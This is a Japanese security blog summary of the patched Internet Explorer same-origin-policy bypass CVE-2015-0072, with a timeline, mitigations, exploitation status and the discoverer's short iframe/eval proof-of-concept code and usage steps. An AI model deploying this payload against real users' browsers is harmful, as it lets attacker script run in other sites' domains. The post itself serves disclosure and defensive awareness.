piyolog

piyokangoの備忘録です。セキュリティの出来事を中心にまとめています。このサイトはGoogle Analyticsを利用しています。

Internet Explorerの脆弱性 CVE-2015-0072 についてまとめてみた。

2015年1月31日にFull DisclosureにInternet Explorer脆弱性情報が投稿されました。ここでは脆弱性に関連する情報をまとめます。

脆弱性の概要

脆弱性識別情報
脆弱性の通称
脆弱性の影響
  • 信頼できないページへのリンクをクリックする等をした際に任意のドメインで任意のJavaScriptが実行される。
  • 同一生成元ポリシーの回避が可能なことによる。
影響を受ける製品・バージョン
発見者・報告者
  • Deusen社 David Leo 氏

タイムライン

日時 出来事
2014年10月13日 DeusenがMicrosoftへ当該脆弱性情報を報告。
2015年1月31日 DeusenがFull DisclosureにIEのCVE-2015-0072の脆弱性情報を投稿。
2015年3月11日 MicrosoftがCVE-2015-0072の修正を含む更新プログラム MS15-018を公開。

脆弱性の仕組み詳細

実証コード(PoC)
  • Google.comを対象にPoCを実行した結果

<iframe src="redirect.php"></iframe>
<iframe src="https://www.google.com/images/srpr/logo11w.png"></iframe>
<script>
    top[0].eval('_=top[1];alert();_.location="javascript:alert(document.domain)"');
</script>

How To Use
1. Close the popup window("confirm" dialog) after three seconds.
2. Click "Go".
3. After 7 seconds, "Hacked by Deusen" is actively injected into dailymail.co.uk.

http://www.deusen.co.uk/items/insider3show.3362009741042107/

脆弱性への回避策

ユーザー側
サーバー側
X-Frame-Optionsを設定してもCVE-2015-0072の影響を受けると指摘
  • X-Frame-Optionsを設定している状態においても、IE11で動作するとの情報がTwitterに掲載されている。

脆弱性悪用に関する情報

  • TrendMicro、Symantecともに悪用に関する情報は確認されていないと報告。
  • 脆弱性を悪用するには攻撃対象に不正なサイトへ誘導する必要がある。
ブラウザとExploitの状況
Browser Exploitable
IE10 (Win7 and 8.1) Yes
IE11 (Win7 and 8.1) Yes
Firefox No
Google Chrome No

更新履歴

  • 2015年2月6日 PM 新規作成
  • 2015年2月13日 PM 続報追加
  • 2015年3月11日 AM Microsoftが当該脆弱性を修正するセキュリティ更新プログラムを公開したことに伴い、最新の情報を反映。